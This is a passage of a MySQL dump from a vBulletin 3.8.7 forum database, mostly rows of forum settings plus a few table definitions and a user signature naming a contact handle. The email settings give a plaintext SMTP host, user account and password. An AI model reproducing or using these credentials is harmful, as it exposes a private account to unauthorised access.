('pc_allowed_bbcode', 'useralbum', '1091', '1091', 'bitfield:nocache|allowedbbcodesfull', 100, 0, 1, 'bitfield', 'vbulletin', '', 0),
('pc_enabled', 'useralbum', '1', '1', 'yesno', 65, 0, 1, 'boolean', 'vbulletin', '', 0),
('pc_maxperpage', 'useralbum', '50', '50', '', 90, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('pc_moderation', 'useralbum', '0', '0', 'yesno', 70, 0, 1, 'boolean', 'vbulletin', '', 0),
('pc_perpage', 'useralbum', '10', '10', '', 80, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('pmfloodtime', 'pm', '60', '60', '', 50, 0, 1, 'number', 'vbulletin', '', 0),
('pmmaxchars', 'pm', '5000', '5000', '', 40, 0, 1, 'integer', 'vbulletin', '', 0),
('pmmaxperpage', 'pm', '100', '100', '', 56, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('pmperpage', 'pm', '50', '50', '', 55, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('pmthrottleperiod', 'pm', '0', '0', '', 51, 0, 1, 'integer', 'vbulletin', 'return ($raw_data >= 0);', 0),
('postedithistory', 'posting', '1', '1', 'yesno', 260, 0, 1, 'boolean', 'vbulletin', '', 0),
('postelements', 'showthread', '0', '0', 'bitfield:nocache|postelements', 300, 0, 1, 'bitfield', 'vbulletin', '', 0),
('postlog_maxage', 'spam_management', '7', '7', '', 30, 0, 1, 'integer', 'vbulletin', '', 0),
('postmaxchars', 'posting', '10000', '10000', '', 31, 0, 1, 'integer', 'vbulletin', '', 0),
('postminchars', 'posting', '10', '10', '', 30, 0, 1, 'integer', 'vbulletin', '', 0),
('posttitlescore', 'searchfunc', '5', '5', '', 210, 0, 1, 'number', 'vbulletin', '', 0),
('privacyurl', 'address', '', '', '', 70, 0, 1, 'free', 'vbulletin', '', 0),
('privallowbbcode', 'pm', '1', '1', 'yesno', 110, 0, 1, 'boolean', 'vbulletin', '', 0),
('privallowbbimagecode', 'pm', '1', '1', 'yesno', 130, 0, 1, 'boolean', 'vbulletin', '', 0),
('privallowhtml', 'pm', '0', '', 'yesno', 140, 0, 1, 'boolean', 'vbulletin', '', 0),
('privallowicons', 'pm', '1', '1', 'yesno', 100, 0, 1, 'boolean', 'vbulletin', '', 0),
('privallowsmilies', 'pm', '1', '1', 'yesno', 120, 0, 1, 'boolean', 'vbulletin', '', 0),
('profilelastpost', 'user', '0', '', 'yesno', 60, 0, 1, 'boolean', 'vbulletin', '', 0),
('profilemaxvisitors', 'user', '10', '10', '', 50, 0, 1, 'integer', 'vbulletin', 'return ($data >= 2);', 0),
('profilepicenabled', 'userpix', '1', '1', 'yesno', 40, 0, 1, 'boolean', 'vbulletin', '', 0),
('profilepicpath', 'version', './customprofilepics', './customprofilepics', '', 70, 0, 1, 'free', 'vbulletin', '', 1),
('profilepicurl', 'version', 'customprofilepics', 'customprofilepics', '', 80, 0, 1, 'free', 'vbulletin', '', 1),
('profileprivacy', 'user', '1', '1', 'yesno', 90, 0, 1, 'boolean', 'vbulletin', '', 0),
('profile_album_amount', 'useralbum', '2', '2', '', 20, 0, 1, 'integer', 'vbulletin', '', 0),
('quickedit', 'posting', '1', '1', 'yesno', 20, 0, 1, 'boolean', 'vbulletin', '', 0),
('quickreply', 'posting', '2', '2', 'radio:piped\r\n0|no\r\n1|yes(,)qr_click_not_required\r\n2|yes(,)qr_click_required', 10, 0, 1, 'number', 'vbulletin', '', 0),
('quotetitle', 'posting', '0', '', 'yesno', 37, 0, 1, 'boolean', 'vbulletin', '', 0),
('ratefunc', 'searchfunc', 'none', 'none', '', 245, 0, 1, 'free', 'vbulletin', '', 0),
('ratescore', 'searchfunc', '0.5', '0.5', '', 240, 0, 1, 'number', 'vbulletin', '', 0),
('rdpower', 'reputation', '365', '365', '', 70, 0, 1, 'number', 'vbulletin', '', 0),
('regimageoption', 'version', '15', '15', 'bitfield:nocache|regimageoptions', 30, 0, 1, 'bitfield', 'vbulletin', '', 0),
('regimagetype', 'version', '', 'GD', '\r\n\r\n\" . (!empty($vbulletin->options[\'magickpath\']) ? \"\r\n\r\n\" : \'\') . \"', 29, 0, 1, 'free', 'vbulletin', '', 0),
('registereddateformat', 'datetime', 'M Y', 'M Y', '', 50, 0, 1, 'free', 'vbulletin', '', 0),
('remoteyui', 'server', '0', '0', 'select:piped\r\n0|none\r\n1|Yahoo!\r\n2|Google', 270, 0, 1, 'integer', 'vbulletin', '', 0),
('replyfunc', 'searchfunc', 'none', 'none', '', 225, 0, 1, 'free', 'vbulletin', '', 0),
('replyscore', 'searchfunc', '0.1', '0.10', '', 220, 0, 1, 'number', 'vbulletin', '', 0),
('reputationdefault', 'reputation', '0', '10', '', 25, 0, 1, 'number', 'vbulletin', '', 0),
('reputationenable', 'reputation', '1', '', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('reputationrepeat', 'reputation', '20', '20', '', 130, 0, 1, 'integer', 'vbulletin', '', 0),
('reputationundefined', 'reputation', 'is off the scale', 'is off the scale', '', 27, 0, 1, 'free', 'vbulletin', '', 0),
('reqbirthday', 'user', '0', '0', 'yesno', 5, 0, 1, 'boolean', 'vbulletin', '', 0),
('requireuniqueemail', 'register', '1', '1', 'yesno', 70, 0, 1, 'boolean', 'vbulletin', '', 0),
('rpemail', 'userinfraction', '1', '1', 'select:piped\r\n0|no_email\r\n1|email_moderators\r\n2|email_moderators_and_administrators', 40, 0, 1, 'number', 'vbulletin', '', 0),
('rpforumid', 'userinfraction', '0', '0', 'select:eval\r\n$options = construct_forum_chooser_options(1);', 20, 0, 1, 'number', 'vbulletin', '', 0),
('rpuserid', 'userinfraction', '0', '', 'username', 30, 0, 1, 'username', 'vbulletin', 'return ($data !== false);', 0),
('rsspodcast', 'external', '1', '1', 'yesno', 27, 0, 1, 'boolean', 'vbulletin', '', 0),
('safeupload', 'server', '0', '', 'yesno', 210, 0, 1, 'boolean', 'vbulletin', '', 0),
('searchfloodtime', 'search', '0', '0', '', 20, 0, 1, 'integer', 'vbulletin', '', 0),
('searchperpage', 'search', '25', '25', '', 30, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('searchsharing', 'search', '1', '1', 'yesno', 105, 0, 1, 'boolean', 'vbulletin', '', 0),
('secureemail', 'email', '0', '1', 'yesno', 30, 0, 1, 'boolean', 'vbulletin', '', 0),
('sgd_maxperpage', 'social_groups', '50', '50', '', 90, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('sgd_perpage', 'social_groups', '10', '10', '', 90, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('sg_allowed_bbcode', 'social_groups', '1091', '1091', 'bitfield:nocache|allowedbbcodesfull', 140, 0, 1, 'bitfield', 'vbulletin', '', 0),
('sg_allow_delete_empty_group', 'social_groups', '1', '1', 'yesno', 160, 0, 1, 'integer', 'vbulletin', '', 0),
('sg_allow_join_to_view', 'social_groups', '0', '0', 'yesno', 100, 0, 1, 'boolean', 'vbulletin', '', 0),
('sg_allow_owner_mod_queue', 'social_groups', '0', '0', 'yesno', 120, 0, 1, 'boolean', 'vbulletin', '', 0),
('sg_category_cloud_size', 'social_groups', '40', '40', '', 210, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('sg_enablesocialgroupicons', 'social_groups', '1', '1', 'yesno', 190, 0, 1, 'boolean', 'vbulletin', '', 0),
('sg_enable_owner_only_discussions', 'social_groups', '0', '0', 'yesno', 130, 0, 1, 'free', 'vbulletin', '', 0),
('sg_maxdescriptionchars', 'social_groups', '1000', '1000', '', 85, 0, 1, 'posint', 'vbulletin', '', 0),
('sg_maxperpage', 'social_groups', '50', '50', '', 60, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('sg_name_maxchars', 'social_groups', '100', '100', '', 10, 0, 1, 'integer', 'vbulletin', 'return ($data > 0 AND $data <= 255);', 0),
('sg_newgroups_count', 'social_groups', '15', '15', '', 200, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('sg_perpage', 'social_groups', '10', '10', '', 50, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('showbirthdays', 'forumhome', '1', '1', 'yesno', 20, 0, 1, 'boolean', 'vbulletin', '', 0),
('showdeficon', 'showthread', 'images/icons/icon1.gif', 'images/icons/icon1.gif', '', 50, 0, 1, 'free', 'vbulletin', '', 0),
('showdots', 'forumdisplay', '1', '1', 'yesno', 70, 0, 1, 'boolean', 'vbulletin', '', 0),
('showevents', 'forumhome', '1', '1', '', 40, 0, 1, 'integer', 'vbulletin', '', 0),
('showeventtype', 'forumhome', '0', '', 'select:piped\r\n0|group_by_event\r\n1|group_by_date', 45, 0, 1, 'number', 'vbulletin', '', 0),
('showforumdescription', 'forumlist', '1', '1', 'yesno', 25, 0, 1, 'boolean', 'vbulletin', '', 0),
('showforumusers', 'forumdisplay', '0', '0', 'select:piped\r\n0|no\r\n1|yes_alphabetical_all\r\n3|yes_alphabetical_members\r\n2|yes_random_all\r\n4|yes_random_members', 10, 0, 1, 'number', 'vbulletin', '', 0),
('showholidays', 'forumhome', '1', '1', 'yesno', 43, 0, 1, 'boolean', 'vbulletin', '', 0),
('showimicons', 'stylelang', '1', '1', 'yesno', 100, 0, 1, 'boolean', 'vbulletin', '', 0),
('showlocks', 'forumlist', '0', '', 'yesno', 40, 0, 1, 'boolean', 'vbulletin', '', 0),
('showmoderatorcolumn', 'forumlist', '0', '', 'yesno', 70, 0, 1, 'boolean', 'vbulletin', '', 0),
('showprefixlastpost', 'forumlist', '2', '2', 'radio:piped\r\n0|no\r\n1|yes_plain_text_version\r\n2|yes_rich_text_version', 80, 0, 1, 'number', 'vbulletin', '', 0),
('showprivateforums', 'forumlist', '0', '0', 'select:piped\r\n0|no\r\n1|yes_hide_post_counts\r\n2|yes_display_post_counts', 30, 0, 1, 'free', 'vbulletin', '', 0),
('showsimilarthreads', 'showthread', '1', '1', 'yesno', 250, 0, 1, 'boolean', 'vbulletin', '', 0),
('showstickies', 'forumdisplay', '1', '1', 'yesno', 30, 0, 1, 'boolean', 'vbulletin', '', 0),
('showthreadusers', 'showthread', '0', '', 'select:piped\r\n0|no\r\n1|yes_alphabetical_all\r\n3|yes_alphabetical_members\r\n2|yes_random_all\r\n4|yes_random_members', 10, 0, 1, 'number', 'vbulletin', '', 0),
('showuserrates', 'reputation', '5', '5', '', 30, 0, 1, 'integer', 'vbulletin', '', 0),
('showvotes', 'poll', '1', '1', '', 100, 0, 1, 'integer', 'vbulletin', 'return (intval($data) > 0);', 0),
('sigpicpath', 'version', './signaturepics', './signaturepics', '', 90, 0, 1, 'free', 'vbulletin', '', 1),
('sigpicurl', 'version', 'signaturepics', 'signaturepics', '', 100, 0, 1, 'free', 'vbulletin', '', 1),
('similarthreadsearch', 'search', '0', '', 'yesno', 100, 0, 1, 'boolean', 'vbulletin', '', 0),
('similarthreadthreshold', 'search', '3.5', '3.5', '', 110, 0, 1, 'number', 'vbulletin', '', 0),
('skypeweb_gfx', 'stylelang', '1', '1', 'radio:piped\r\n0|no\r\n1|yes\r\n2|language_specific_skypeweb_graphics', 110, 0, 1, 'number', 'vbulletin', 'return in_array($data, array(0, 1, 2));', 0),
('smcolumns', 'postiface', '3', '3', '', 50, 0, 1, 'integer', 'vbulletin', '', 0),
('smtotal', 'postiface', '15', '15', '', 40, 0, 1, 'integer', 'vbulletin', '', 0),
('smtp_host', 'email', 'smtp.yandex.ru', '', '', 110, 0, 1, 'free', 'vbulletin', '', 0),
('smtp_pass', 'email', 'fb4d56f4', '', '', 140, 0, 1, 'free', 'vbulletin', '', 0),
('smtp_port', 'email', '465', '25', '', 120, 0, 1, 'integer', 'vbulletin', '', 0),
('smtp_tls', 'email', 'ssl', 'none', 'select:piped\r\nnone|none\r\nssl|SSL\r\ntls|TLS', 150, 0, 1, 'free', 'vbulletin', '', 0),
('smtp_user', 'email', 'forum@w0rm.ws', '', '', 130, 0, 1, 'free', 'vbulletin', '', 0),
('socialbookmarks', 'showthread', '0', '0', 'yesno', 310, 0, 1, 'boolean', 'vbulletin', '', 0),
('social_moderation', 'social_groups', '0', '0', 'yesno', 20, 0, 1, 'boolean', 'vbulletin', '', 0),
('socnet', 'user', '31', '31', 'bitfield:misc|socnet', 1, 0, 1, 'bitfield', 'vbulletin', '', 0),
('socnet_groups_albums_enabled', 'social_groups', '1', '1', 'yesno', 110, 0, 1, 'boolean', 'vbulletin', '', 0),
('socnet_groups_msg_enabled', 'social_groups', '1', '1', 'yesno', 30, 0, 1, 'boolean', 'vbulletin', '', 0),
('softlinebreakchars', 'user', '90', '90', '', 110, 0, 1, 'integer', 'vbulletin', '', 0),
('stopshouting', 'posting', '3', '3', '', 60, 0, 1, 'integer', 'vbulletin', '', 0),
('storecssasfile', 'stylelang', '0', '', 'yesno', 80, 0, 1, 'boolean', 'vbulletin', '', 0),
('styleid', 'stylelang', '2', '1', 'select:eval\r\n$options = fetch_style_title_options_array();', 50, 0, 1, 'number', 'vbulletin', '', 1),
('subforumdepth', 'forumlist', '0', '0', '', 20, 0, 1, 'integer', 'vbulletin', '', 0),
('subscriptionmethods', 'version', '0', '0', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 1),
('tagbadwords', 'tagging', '', '', 'textarea', 31, 0, 1, 'free', 'vbulletin', '', 0),
('tagcloud_cachetime', 'tagging', '30', '30', '', 420, 0, 1, 'integer', 'vbulletin', '', 0),
('tagcloud_levels', 'tagging', '5', '5', '', 410, 0, 1, 'integer', 'vbulletin', '', 0),
('tagcloud_searchcloud', 'tagging', '1', '1', 'yesno', 440, 0, 1, 'boolean', 'vbulletin', '', 0),
('tagcloud_searchhistory', 'tagging', '30', '30', '', 450, 0, 1, 'integer', 'vbulletin', '', 0),
('tagcloud_tags', 'tagging', '70', '70', '', 400, 0, 1, 'integer', 'vbulletin', '', 0),
('tagcloud_usagehistory', 'tagging', '365', '365', '', 425, 0, 1, 'integer', 'vbulletin', '', 0),
('tagcloud_usergroup', 'tagging', '2', '2', 'usergroupextra\r\n-1|live_permission_check\r\n0|no_permission_check', 427, 0, 1, 'integer', 'vbulletin', '', 0),
('tagdelimiter', 'tagging', '', '', '', 35, 0, 1, 'free', 'vbulletin', '', 0),
('tagforcelower', 'tagging', '1', '1', 'yesno', 70, 0, 1, 'boolean', 'vbulletin', '', 0),
('taggoodwords', 'tagging', '', '', 'textarea', 32, 0, 1, 'free', 'vbulletin', '', 0),
('tagmaxlen', 'tagging', '25', '25', '', 30, 0, 1, 'integer', 'vbulletin', '', 0),
('tagmaxstarter', 'tagging', '5', '5', '', 50, 0, 1, 'integer', 'vbulletin', '', 0),
('tagmaxthread', 'tagging', '25', '25', '', 40, 0, 1, 'integer', 'vbulletin', '', 0),
('tagmaxuser', 'tagging', '2', '2', '', 60, 0, 1, 'integer', 'vbulletin', '', 0),
('tagminlen', 'tagging', '3', '3', '', 20, 0, 1, 'integer', 'vbulletin', '', 0),
('templateversion', 'version', '3.8.7', '3.8.7', '', 1, 0, 1, 'free', 'vbulletin', '', 0),
('threadedmode', 'threadedmode', '0', '', 'yesno', 20, 0, 1, 'boolean', 'vbulletin', '', 0),
('threaded_listdepth', 'threadedmode', '5', '5', '', 30, 0, 1, 'integer', 'vbulletin', '', 0),
('threaded_maxcache', 'threadedmode', '40', '40', '', 40, 0, 1, 'integer', 'vbulletin', '', 0),
('threaded_trimtitle', 'threadedmode', '30', '30', '', 50, 0, 1, 'integer', 'vbulletin', '', 0),
('threadmarking', 'general', '0', '0', 'radio:piped\r\n0|inactivity_cookie_based\r\n1|database_no_automatic_forum_marking\r\n2|database_automatic_forum_marking', 340, 0, 1, 'free', 'vbulletin', '', 0),
('threadpreview', 'forumdisplay', '150', '150', '', 220, 0, 1, 'integer', 'vbulletin', '', 0),
('threadsubscribed', 'showthread', '1', '1', 'yesno', 240, 0, 1, 'boolean', 'vbulletin', '', 0),
('threadtagging', 'tagging', '1', '1', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('threadtitlescore', 'searchfunc', '5', '5', '', 200, 0, 1, 'number', 'vbulletin', '', 0),
('threadviewslive', 'server', '0', '', 'yesno', 40, 0, 1, 'boolean', 'vbulletin', '', 0),
('threadvoted', 'showthread', '0', '', 'yesno', 230, 0, 1, 'boolean', 'vbulletin', '', 0),
('thumbcolor', 'attachment', '#000000', '#000000', '', 80, 0, 1, 'free', 'vbulletin', 'return (preg_match(\'~^#([0-9A-F]{6})$~i\', $data) > 0);', 0),
('thumbquality', 'attachment', '75', '75', 'select:piped\r\n65|65\r\n75|75\r\n85|85\r\n95|95', 65, 0, 1, 'integer', 'vbulletin', '', 0),
('timeformat', 'datetime', 'h:i A', 'h:i A', '', 40, 0, 1, 'free', 'vbulletin', '', 0),
('timeoffset', 'datetime', '4', '', 'select:eval\r\n$options = fetch_timezones_array();', 20, 0, 1, 'number', 'vbulletin', '', 0),
('timeoutcontrolpanel', 'admincp', '0', '', 'yesno', 20, 0, 1, 'boolean', 'vbulletin', '', 0),
('titlemaxchars', 'posting', '85', '85', '', 32, 0, 1, 'integer', 'vbulletin', 'return ($data > 0 AND $data < 251);', 0),
('tmppath', 'server', '/tmp', '/tmp', '', 220, 0, 1, 'free', 'vbulletin', '', 0),
('tosurl', 'address', '', '', '', 75, 0, 1, 'free', 'vbulletin', '', 0),
('twitter_key_pub', 'twitter', '', '', '', 10, 0, 1, 'free', 'kk_vbtwitter', '', 0),
('twitter_key_sec', 'twitter', '', '', '', 20, 0, 1, 'free', 'kk_vbtwitter', '', 0),
('uiforumid', 'userinfraction', '0', '0', 'select:eval\r\n$options = construct_forum_chooser_options(1);', 10, 0, 1, 'number', 'vbulletin', '', 0),
('uimessage', 'userinfraction', '1', '1', 'yesno', 15, 0, 1, 'number', 'vbulletin', '', 0),
('unallowhtml', 'usernote', '0', '', 'yesno', 40, 0, 1, 'boolean', 'vbulletin', '', 0),
('unallowimg', 'usernote', '1', '1', 'yesno', 30, 0, 1, 'boolean', 'vbulletin', '', 0),
('unallowsmilies', 'usernote', '1', '1', 'yesno', 20, 0, 1, 'boolean', 'vbulletin', '', 0),
('unallowvbcode', 'usernote', '1', '1', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('updatelastpost', 'poll', '0', '', 'yesno', 20, 0, 1, 'boolean', 'vbulletin', '', 0),
('usebulkheader', 'email', '0', '0', 'yesno', 95, 0, 1, 'boolean', 'vbulletin', '', 0),
('usecoppa', 'register', '0', '0', 'select:piped\r\n0|coppa_disabled\r\n1|coppa_enabled\r\n2|deny_under_13_registration', 15, 0, 1, 'number', 'vbulletin', '', 0),
('usefileavatar', 'version', '', '', 'yesno', 40, 0, 1, 'boolean', 'vbulletin', '', 1),
('usefilegroupicon', 'version', '0', '0', 'yesno', 160, 0, 1, 'boolean', 'vbulletin', '', 1),
('useforumjump', 'general', '0', '1', 'yesno', 40, 0, 1, 'boolean', 'vbulletin', '', 0),
('useheaderredirect', 'http', '1', '1', 'yesno', 230, 0, 1, 'boolean', 'vbulletin', '', 0),
('usehotthreads', 'forumdisplay', '1', '1', 'yesno', 100, 0, 1, 'boolean', 'vbulletin', '', 0),
('usemailqueue', 'email', '1', '1', 'radio:piped\r\n0|no\r\n1|yes\r\n2|yes_with_locking', 70, 0, 1, 'number', 'vbulletin', '', 0),
('usememberlistadvsearch', 'memberlist', '1', '1', 'yesno', 50, 0, 1, 'boolean', 'vbulletin', '', 0),
('usepopups', 'stylelang', '1', '1', 'yesno', 90, 0, 1, 'boolean', 'vbulletin', '', 0),
('usercss_allowed_border_widths', 'profile_customization', 'small|1px\r\nmedium|2px\r\nlarge|3px', 'small|1px\r\nmedium|2px\r\nlarge|3px', 'textarea', 30, 0, 1, 'free', 'vbulletin', '', 0),
('usercss_allowed_fonts', 'profile_customization', 'arial|Arial, Helvetica, sans-serif\r\ntimes_new_roman|\'Times New Roman\', Times, serif\r\ncourier_new|\'Courier New\', Courier, monospace\r\ngeorgia|Georgia, \'Times New Roman\', Times, serif\r\nverdana|Verdana, Arial, Helvetica, sans-serif\r\ntahoma|Tahoma, Verdana, Arial, Helvetica, sans-serif\r\ngeneva|Geneva, Arial, Helvetica, sans-serif\r\ntrebuchet_ms|\'Trebuchet MS\', Arial, Helvetica, sans-serif\r\ncomic_sans_ms|\'Comic Sans MS\', Arial, Helvetica, sans-serif', 'arial|Arial, Helvetica, sans-serif\r\ntimes_new_roman|\'Times New Roman\', Times, serif\r\ncourier_new|\'Courier New\', Courier, monospace\r\ngeorgia|Georgia, \'Times New Roman\', Times, serif\r\nverdana|Verdana, Arial, Helvetica, sans-serif\r\ntahoma|Tahoma, Verdana, Arial, Helvetica, sans-serif\r\ngeneva|Geneva, Arial, Helvetica, sans-serif\r\ntrebuchet_ms|\'Trebuchet MS\', Arial, Helvetica, sans-serif\r\ncomic_sans_ms|\'Comic Sans MS\', Arial, Helvetica, sans-serif', 'textarea', 10, 0, 1, 'free', 'vbulletin', '', 0),
('usercss_allowed_font_sizes', 'profile_customization', 'small|small\r\nmedium|medium\r\nlarge|large', 'small|small\r\nmedium|medium\r\nlarge|large', 'textarea', 20, 0, 1, 'free', 'vbulletin', '', 0),
('usercss_allowed_padding', 'profile_customization', 'none|0px\r\ntiny|1px\r\nsmall|2px\r\nmedium|3px\r\nlarge|6px\r\nhuge|10px\r\ngargantuan|20px', 'none|0px\r\ntiny|1px\r\nsmall|2px\r\nmedium|3px\r\nlarge|6px\r\nhuge|10px\r\ngargantuan|20px', 'textarea', 40, 0, 1, 'free', 'vbulletin', '', 0),
('usereferrer', 'register', '1', '1', 'yesno', 120, 0, 1, 'boolean', 'vbulletin', '', 0),
('usermaxposts', 'showthread', '5,10,20,30,40', '5,10,20,30,40', '', 30, 0, 1, 'free', 'vbulletin', '', 0),
('usernameregex', 'register', '', '', '', 105, 0, 1, 'free', 'vbulletin', '', 0),
('usernamereusedelay', 'register', '365', '365', '', 140, 0, 1, 'integer', 'vbulletin', '', 0),
('usestrikesystem', 'general', '1', '1', 'yesno', 310, 0, 1, 'boolean', 'vbulletin', '', 0),
('use_smtp', 'email', '1', '', 'yesno', 100, 0, 1, 'boolean', 'vbulletin', '', 0),
('vb_antispam_key', 'spam_management', '', '', '', 10, 0, 1, 'free', 'vbulletin', '', 0),
('vb_antispam_posts', 'spam_management', '0', '0', '', 20, 0, 1, 'integer', 'vbulletin', '', 0),
('vb_antispam_type', 'spam_management', '0', '0', 'select:piped\r\n0|disable_scanning\r\n1|Akismet\r\n2|Typepad AntiSpam Beta', 5, 0, 1, 'integer', 'vbulletin', '', 0),
('verifyemail', 'register', '0', '', 'yesno', 60, 0, 1, 'boolean', 'vbulletin', '', 0),
('viewattachedimages', 'attachment', '1', '1', 'select:piped\r\n0|no\r\n1|yes\r\n2|only_one_per_post', 40, 0, 1, 'number', 'vbulletin', '', 0),
('viewfunc', 'searchfunc', 'none', 'none', '', 235, 0, 1, 'free', 'vbulletin', '', 0),
('viewscore', 'searchfunc', '0.01', '0.01', '', 230, 0, 1, 'number', 'vbulletin', '', 0),
('vm_allowed_bbcode', 'visitor_message', '1091', '1091', 'bitfield:nocache|allowedbbcodesfull', 70, 0, 1, 'bitfield', 'vbulletin', '', 0),
('vm_maxchars', 'visitor_message', '1000', '1000', '', 20, 0, 1, 'integer', 'vbulletin', '', 0),
('vm_maxperpage', 'visitor_message', '50', '50', '', 50, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('vm_moderation', 'visitor_message', '0', '', 'yesno', 60, 0, 1, 'boolean', 'vbulletin', '', 0),
('vm_perpage', 'visitor_message', '10', '10', '', 40, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('votechange', 'poll', '0', '', 'yesno', 110, 0, 1, 'boolean', 'vbulletin', '', 0),
('webmasteremail', 'address', 'forum@w0rm.ws', 'webmaster@example.com', '', 60, 0, 1, 'free', 'vbulletin', '', 0),
('welcomemail', 'register', '0', '1', 'yesno', 30, 0, 1, 'boolean', 'vbulletin', '', 0),
('welcomepm', 'register', '0', '', 'username', 35, 0, 1, 'username', 'vbulletin', 'return ($data !== false);', 0),
('WOLenable', 'online', '1', '1', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('WOLguests', 'online', '0', '1', 'yesno', 30, 0, 1, 'boolean', 'vbulletin', '', 0),
('WOLrefresh', 'online', '60', '60', '', 20, 0, 1, 'integer', 'vbulletin', '', 0),
('WOLresolve', 'online', '0', '', 'yesno', 40, 0, 1, 'boolean', 'vbulletin', '', 0),
('wordwrap', 'showthread', '50', '50', '', 60, 0, 1, 'integer', 'vbulletin', '', 0),
('wysiwyg_smtotal', 'postiface', '15', '15', '', 110, 0, 1, 'integer', 'vbulletin', '', 0),
('yestoday', 'datetime', '1', '1', 'radio:piped\r\n0|normal\r\n1|yesterday_today\r\n2|detailed', 10, 0, 1, 'number', 'vbulletin', '', 0);
DROP TABLE IF EXISTS `settinggroup`;
CREATE TABLE `settinggroup` (
`grouptitle` char(50) NOT NULL DEFAULT '',
`displayorder` smallint(5) unsigned NOT NULL DEFAULT '0',
`volatile` smallint(5) unsigned NOT NULL DEFAULT '0',
`product` varchar(25) NOT NULL DEFAULT '',
PRIMARY KEY (`grouptitle`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `settinggroup` (`grouptitle`, `displayorder`, `volatile`, `product`) VALUES
('address', 20, 1, 'vbulletin'),
('admincp', 520, 1, 'vbulletin'),
('archive', 510, 1, 'vbulletin'),
('attachment', 350, 1, 'vbulletin'),
('banning', 260, 1, 'vbulletin'),
('bbcode', 300, 1, 'vbulletin'),
('censor', 70, 1, 'vbulletin'),
('datetime', 40, 1, 'vbulletin'),
('email', 70, 1, 'vbulletin'),
('errorhandling', 540, 1, 'vbulletin'),
('external', 530, 1, 'vbulletin'),
('forumdisplay', 420, 1, 'vbulletin'),
('forumhome', 400, 1, 'vbulletin'),
('forumlist', 410, 1, 'vbulletin'),
('general', 30, 1, 'vbulletin'),
('http', 50, 1, 'vbulletin'),
('humanverification', 37, 1, 'vbulletin'),
('imagesettings', 35, 1, 'vbulletin'),
('memberlist', 250, 1, 'vbulletin'),
('online', 500, 1, 'vbulletin'),
('onoff', 10, 1, 'vbulletin'),
('paidsubs', 570, 1, 'vbulletin'),
('plugin', 560, 1, 'vbulletin'),
('pm', 440, 1, 'vbulletin'),
('poll', 360, 1, 'vbulletin'),
('postiface', 320, 1, 'vbulletin'),
('posting', 310, 1, 'vbulletin'),
('profile_customization', 215, 1, 'vbulletin'),
('register', 200, 1, 'vbulletin'),
('reputation', 230, 1, 'vbulletin'),
('search', 370, 1, 'vbulletin'),
('searchfunc', 380, 1, 'vbulletin'),
('search_default', 375, 1, 'vbulletin'),
('server', 60, 1, 'vbulletin'),
('showthread', 430, 1, 'vbulletin'),
('social_groups', 216, 1, 'vbulletin'),
('spam_management', 580, 1, 'vbulletin'),
('stylelang', 65, 1, 'vbulletin'),
('tagging', 385, 1, 'vbulletin'),
('threadedmode', 435, 1, 'vbulletin'),
('twitter', 590, 1, 'kk_vbtwitter'),
('user', 210, 1, 'vbulletin'),
('useralbum', 215, 1, 'vbulletin'),
('userinfraction', 205, 1, 'vbulletin'),
('usernote', 240, 1, 'vbulletin'),
('userpix', 220, 1, 'vbulletin'),
('version', 0, 1, 'vbulletin'),
('visitor_message', 215, 1, 'vbulletin');
DROP TABLE IF EXISTS `sigparsed`;
CREATE TABLE `sigparsed` (
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`styleid` smallint(5) unsigned NOT NULL DEFAULT '0',
`languageid` smallint(5) unsigned NOT NULL DEFAULT '0',
`signatureparsed` mediumtext,
`hasimages` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`userid`,`styleid`,`languageid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `sigparsed` (`userid`, `styleid`, `languageid`, `signatureparsed`, `hasimages`) VALUES
(386, 2, 1, 'To Be Or Not To Be !?
Shell_Exec@xmpp.jp
', 0);
DROP TABLE IF EXISTS `sigpic`;
CREATE TABLE `sigpic` (
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`filedata` mediumblob,
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`filename` varchar(100) NOT NULL DEFAULT '',
`visible` smallint(6) NOT NULL DEFAULT '1',
`filesize` int(10) unsigned NOT NULL DEFAULT '0',
`width` smallint(5) unsigned NOT NULL DEFAULT '0',
`height` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`userid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `smilie`;
CREATE TABLE `smilie` (
`smilieid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`title` char(100) NOT NULL DEFAULT '',
`smilietext` char(20) NOT NULL DEFAULT '',
`smiliepath` char(100) NOT NULL DEFAULT '',
`imagecategoryid` smallint(5) unsigned NOT NULL DEFAULT '0',
`displayorder` smallint(5) unsigned NOT NULL DEFAULT '1',
PRIMARY KEY (`smilieid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `smilie` (`smilieid`, `title`, `smilietext`, `smiliepath`, `imagecategoryid`, `displayorder`) VALUES
(1, 'Smile', ':)', 'images/smilies/smile.gif', 1, 1),
(2, 'Embarrassment', ':o', 'images/smilies/redface.gif', 1, 1),
(3, 'Big Grin', ':D', 'images/smilies/biggrin.gif', 1, 1),
